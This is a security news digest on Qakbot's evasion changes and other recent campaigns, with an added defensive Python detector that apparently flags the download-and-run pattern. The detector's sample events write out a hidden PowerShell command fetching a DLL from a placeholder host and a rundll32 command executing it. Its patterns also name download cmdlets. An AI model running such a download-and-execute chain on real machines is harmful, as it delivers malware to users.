The Hacker News reports that Qakbot malware operators have been discovered by Zscaler researchers to have adopted code obfuscation and new attack chain layers, as well as leveraged various URLs and file extensions for payload delivery in an effort to better conceal their operations.
"Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot," said Zscaler Threatlabz researchers Aditya Sharma and Tarun Dewan.
Microsoft's plan to block Office macros by default, which was temporarily paused, had prompted Qakbot to hasten its transition from XLM macros to .LNK files in May. Qakbot has also been modified to download malicious DLLs through PowerShell and to use rundll32.exe for payload delivery.
Fortinet researchers previously noted that Qakbot has been favored by threat actors for its modularity and its resilience against detection.
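As an added, defender-side illustration (not code from Zscaler, Fortinet or The Hacker News), the following Python flags the PowerShell-download-to-rundll32 chain described above over constructed Sysmon-style process-creation events; the event field names, rule names and sample command lines are assumptions, not captured Qakbot telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified),
# in chronological order. Illustrative only; not real Qakbot telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\alice\AppData\Local\Temp\upd.dll"},
    {"pid": 101, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\alice\AppData\Local\Temp\upd.dll"},
    {"pid": 102, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,DllRegisterServer"},
    {"pid": 103, "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign baseline
]

USER_WRITABLE = re.compile(r"\\(users|programdata)\\|\\temp\\|\\appdata\\", re.I)
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
OUTFILE = re.compile(r'-outfile\s+"?([^"\s]+\.dll)', re.I)          # DLL written by a PowerShell download
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",\s]+\.dll)', re.I)  # DLL handed to rundll32

def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_event(ev):
    """Single-event rules; returns the names of the rules that fired (assumed rule names)."""
    hits, image, parent, cmd = [], _base(ev["image"]), _base(ev["parent"]), ev["cmdline"]
    if image == "powershell.exe" and DOWNLOAD.search(cmd) and OUTFILE.search(cmd):
        hits.append("powershell_dll_download")
    if image == "rundll32.exe":
        m = RUNDLL_ARG.search(cmd)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("rundll32_user_writable_dll")   # DLL loaded from a user-writable location
        if parent in ("powershell.exe", "cmd.exe"):
            hits.append("rundll32_spawned_by_shell")
    return hits

def find_download_to_rundll32_chains(events):
    """Correlate a PowerShell download's -OutFile DLL with a later rundll32 load of that same path.
    Returns (downloader_pid, rundll32_pid, dll_path) tuples."""
    downloaded, chains = {}, []
    for ev in events:
        cmd = ev["cmdline"]
        if _base(ev["image"]) == "powershell.exe" and DOWNLOAD.search(cmd):
            m = OUTFILE.search(cmd)
            if m:
                downloaded[m.group(1).lower()] = ev["pid"]
        elif _base(ev["image"]) == "rundll32.exe":
            m = RUNDLL_ARG.search(cmd)
            if m and m.group(1).lower() in downloaded:
                chains.append((downloaded[m.group(1).lower()], ev["pid"], m.group(1)))
    return chains
```

Run over SAMPLE_EVENTS, the per-event rules fire on the PowerShell and child rundll32 processes but not on the system-DLL baseline, and the correlation links pid 101's download to pid 102's load.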
New attacks with the updated SysUpdate toolkit have been deployed by Chinese advanced persistent threat operation Budworm, also known as APT27, Emissary Panda, Bronze Union, Lucky Mouse, Iron Tiger, and Red Phoenix, against an Asian government and a Middle East-based telecommunications provider, reports The Hacker News.
Forty-five malicious NPM and PyPI packages have been deployed by threat actors to facilitate extensive data theft operations as part of a campaign that commenced on Sept. 12, according to BleepingComputer.
Sixty thousand emails from U.S. State Department accounts were noted by a staffer working for Sen. Eric Schmitt, R-Mo., to have been exfiltrated by Chinese threat actors during the widespread compromise of Microsoft email accounts that commenced in May, according to Reuters.